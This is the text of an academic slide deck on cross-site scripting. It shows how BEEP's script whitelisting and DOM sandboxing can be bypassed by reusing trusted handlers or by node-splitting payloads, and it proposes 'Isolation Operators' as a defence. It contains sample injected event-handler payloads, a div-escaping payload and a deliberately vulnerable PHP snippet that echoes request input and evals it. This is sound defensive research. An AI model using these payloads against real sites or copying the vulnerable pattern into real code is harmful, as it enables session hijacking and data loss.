[PPT] - Code-Injection Attacks in Browsers Supporting Policies Elias PowerPoint Presentation

SLIDE 1

Code-Injection Attacks in Browsers Supporting Policies

Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

SLIDE 2

What is all about?

New code-injection attacks

r

return-to-libc attacks in the web

Elias Athanasopoulos, FORTH‐ICS  2  Code Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 3

Motivation

 Cross-Site Scripting (XSS) is considered as a major threat

 XSS attacks are roughly 80% of all documented security vulnerabilities (Symantec, 2007)  McAfee Websites Vulnerable to Attacks (4th May 2009)

 Web sites are becoming richer

 AJAX interfaces  Increase of client-side code (JavaScript)

Elias Athanasopoulos, FORTH‐ICS  3  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 4

XSS Mitigation

 Static analysis  Taint analysis  Server/Client sanitization  HTTP Cookies  Enforcing policies in the browser

Elias Athanasopoulos, FORTH‐ICS  4  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 5

XSS Mitigation

 Static analysis  Taint analysis  Server/Client sanitization  HTTP Cookies  Enforcing policies in the browser

T. Jim, N. Swamy, and M. Hicks.

BEEP: Defeating script injection attacks with browser-enforced embedded policies (ACM WWW 2007)

Elias Athanasopoulos, FORTH‐ICS  5  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 6

Overview

 How can an attacker bypass BEEP

 return-to-libc attacks in the web

 A new framework for XSS mitigation based

n Isolation Operators

Elias Athanasopoulos, FORTH‐ICS  6  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 7

Roadmap

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

Elias Athanasopoulos, FORTH‐ICS  7  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 8

XSS Short Introduction

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

Elias Athanasopoulos, FORTH‐ICS  8  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 9

An Example

 A user posts a comment to a blog story  She enters some JavaScript inside

 My cool comment.

 Alice is browsing also the story; the script renders in her browser  The attacker receives a request to her server with Alice’s cookie

Elias Athanasopoulos, FORTH‐ICS  9  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 10

Stealing Cookies…

 The attacker has managed to steal Alice’s Cookie  The attacker is able to hijack Alice’s session

 Login to the web site with Alice’s credentials  Perform actions in the web site like she was Alice

Elias Athanasopoulos, FORTH‐ICS  10  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 11

…is not the only way!

 The attacker could inject JavaScript code that performs operations on the web site

 Delete Alice’s comments  Post comments (with Alice’s credentials)

 If Alice had administrator privileges

 The attacker could take full control of the web site in some occasions

Elias Athanasopoulos, FORTH‐ICS  11  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 12

XSS != Cookie Stealing

 A buffer overflow attack compromises an application

 This can sometimes lead to host compromising

 An XSS attack compromises a web application

 This can sometimes lead to web system compromising (e.g. the ‘’Google system’’)

Elias Athanasopoulos, FORTH‐ICS  12  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 13

BEEP & Attacks

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

Elias Athanasopoulos, FORTH‐ICS  13  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 14

BEEP

 The web server embeds policies in web documents  The web browser

 Identifies trusted and non trusted client-side code  Executes client-side code according to the defined policies

Elias Athanasopoulos, FORTH‐ICS  14  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 15

Assumptions

Web browsers have all the required complexity in order to detect (parse) and render a script

Elias Athanasopoulos, FORTH‐ICS  15  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 16

Assumptions

The web application developer knows exactly which scripts are trusted to be executed in the web browser

grep -i ”\<script" -o fb-home.php | wc -l

23

Elias Athanasopoulos, FORTH‐ICS  16  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 17

Policy Enforcement

 Script Whitelisting  DOM Sandboxing

Elias Athanasopoulos, FORTH‐ICS  17  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 18

Script Whitelisting

 Web server

 Generates a cryptographic hash for each script it produces  Injects in each web document the list of cryptographic hashes (white-list), corresponding to the trusted scripts

 Web browser

 Using a hook, it checks if there is a hash in the white-list for each script before execution

Elias Athanasopoulos, FORTH‐ICS  18  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 19

Limitations

 No validation about

 Script location in the web page  Asynchronous events (onload, onclick, etc.)

Elias Athanasopoulos, FORTH‐ICS  19  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 20

return-to-libc in the web

 An attacker could mount an attack using existing white-listed JavaScript code return-to-libc: during a buffer overflow, the attacker transfers control to a location in libc instead to code in the injected buffer

Elias Athanasopoulos, FORTH‐ICS  20  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 21

Examples

 Annoyance  Data Loss  Complete Takeover

Elias Athanasopoulos, FORTH‐ICS  21  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 22

Vulnerable Blog

1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">Logout</a> 5: <div class="blog_entry" id="123">{TEXT...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments”> 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href=’http:// www.google.com’;" src="logo.gif"> 9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href=’http:// www.google.com’;">Google</a> 12: </body> 13:</html>

Elias Athanasopoulos, FORTH‐ICS  22  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 23

Annoyance

1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">Logout</a> 5: <div class="blog_entry" id="123">{TEXT...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments”> 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href=’http://

www.google.com’;" src="logo.gif">

9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href=’http:// www.google.com’;">Google</a> 12: </body> 13:</html>

Elias Athanasopoulos, FORTH‐ICS  23  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 24

Data Loss

1: <html> 2: <head> <title> Blog! </title> <head> 3: <body> 4: <a onclick="logout();">Logout</a> 5: <div class="blog_entry" id="123">{TEXT...} <input type="button" onclick="delete(123);"></div> 6: <div class="blog_comments”> 7: <li> <img onload="logout();" src="logo.gif"> 8: <li> <img onload="window.location.href=’http:// www.google.com’;" src="logo.gif"> 9: <li> <img onload="delete(123);"> 10: </div> 11: <a onclick="window.location.href=’http:// www.google.com’;">Google</a> 12: </body> 13:</html>

Elias Athanasopoulos, FORTH‐ICS  24  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 25

DOM Sandboxing

 The server marks specific regions as trusted

 <div class=untrust> … no code here … </div>

 The browser executes code only in trusted regions

Elias Athanasopoulos, FORTH‐ICS  25  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 26

Vulnerability

 Node splitting

 <div class=untrusted> {content} </div>  content := </div><div class=trusted>

{script} </div><div class=untrusted>

 Countermeasure

 Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart XSS Attacks (NDSS 2009)

Elias Athanasopoulos, FORTH‐ICS  26  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 27

DOM Sandboxing Limitations

 Marking div/span elements with trust properties requires human effort

grep -i ”\<div" -o fb-home.php | wc -l 2708 grep -i "\/span" -o fb-home.php | wc –l 982

 Sometimes an attack can take place without having a DOM tree

 Secure Content Sniffing for Web Browsers, or How to Stop Papers from Reviewing Themselves (Oakland 2009)

Elias Athanasopoulos, FORTH‐ICS  27  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 28

Isolation Operators

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

Elias Athanasopoulos, FORTH‐ICS  28  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 29

Overview

 We propose a framework for complete isolation of trusted client-side code  Key properties

 Attack coverage  Easy implementation  Low overhead

Elias Athanasopoulos, FORTH‐ICS  29  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 30

Architecture

 Code separation at development time  Isolation operators  Browser actions

Elias Athanasopoulos, FORTH‐ICS  30  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 31

Code Separation

 We propose client-side code separation at development time  Server-side technologies already use similar code separation schemes

 PHP (<?php and ?>)

 Enforcing the scheme in JavaScript can successfully tag all legitimate JavaScript

Elias Athanasopoulos, FORTH‐ICS  31  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 32

Example

<html> <img onload+=”render();”> <div class=‘welcome’> <<<< alert(“Hello World”); >>>> </div> </html>

Elias Athanasopoulos, FORTH‐ICS  32  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 33

Isolation Operators

 An Isolation Operator (IO) acts on entire blocks of code  An IO transposes a block of code in a new isolated domain  The isolated domain can not be ad hoc executed  The code must be de-isolated first and then executed

Elias Athanasopoulos, FORTH‐ICS  33  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 34

IO Examples

 XOR  Symmetric encryption (e.g. AES)  Matrix multiplication

 Create a matrix with the bytes of a script  Multiply it with a matrix

Elias Athanasopoulos, FORTH‐ICS  34  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 35

IO Examples

 XOR  Symmetric encryption (e.g. AES)  Matrix multiplication

 Create a matrix with the bytes of a script  Multiply it with a matrix

Elias Athanasopoulos, FORTH‐ICS  35  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 36

In Action

<html> <div class=‘welcome’> <<<< alert(“Hello World”); >>>> </div> </html>

Elias Athanasopoulos, FORTH‐ICS  36  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 37

Applying IO

<html> <div class=‘welcome’> <script> vpSUlJTV2NHGwJyW/NHY... </script> </div> </html>

Elias Athanasopoulos, FORTH‐ICS  37  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 38

Browser Actions

 Policies are expressed in the browser environment as actions  The browser de-isolates and executes client- side code, instead of simply executing it  Example

 Look for X-IO-Key in HTTP headers  Apply XOR (X-IO-Key) and execute

Elias Athanasopoulos, FORTH‐ICS  38  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 39

Conclusion

 XSS Short Introduction  BEEP & Attacks  Isolation Operators  Conclusion  Demo

Elias Athanasopoulos, FORTH‐ICS  39  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 40

Conclusion

 Identify limitations of current policy based approaches for XSS mitigation  Introduce new XSS attacks

 return-to-libc in the web

 Proposal of an XSS mitigation scheme based

n Isolation Operators

Elias Athanasopoulos, FORTH‐ICS  40  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 41

Ongoing Work

 Implementation of Isolation Operators in three leading web browsers

 Firefox, WebKit (Safari), Chromium

 Implementation of the server-side part in Apache  Full evaluation

 Attack coverage, server overhead, client

verhead, user-experience

 Full paper under submission

Elias Athanasopoulos, FORTH‐ICS  41  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 42

Demo

Elias Athanasopoulos, FORTH‐ICS  42  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 43

Thank you!

Elias Athanasopoulos FORTH-ICS elathan@ics.forth.gr

Elias Athanasopoulos, FORTH‐ICS  43  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 44

BACKUP

Elias Athanasopoulos, FORTH‐ICS  44  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 45

IO vs ISR

 Isolation Operators (IO) are heavily inspired by Instruction Set Randomization (ISR)  ISR operates on instruction set  IOs operate on blocks of source code

Elias Athanasopoulos, FORTH‐ICS  45  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 46

IO vs ISR

 ISR alert42(“…”);  IO vpSUlJTV2NHGwJyW/NHY...

Elias Athanasopoulos, FORTH‐ICS  46  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 47

Why IO for JavaScript?

 Server lacks support for JavaScript handling  Applying ISR for JavaScript

 Requires at least a full JavaScript parser at the server side  The source will be parsed twice (one in production time and one in execution time)

Elias Athanasopoulos, FORTH‐ICS  47  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 

SLIDE 48

Evil eval()

<?php $s = "<div id=’malicious’>" . $_GET["id"] . "</div>";  echo $s; ?> <script> eval(document.getElementById(’malicious’). innerHTML); </script>

Elias Athanasopoulos, FORTH‐ICS  48  Code‐Injec=on A>acks in Browsers  Suppor=ng Policies 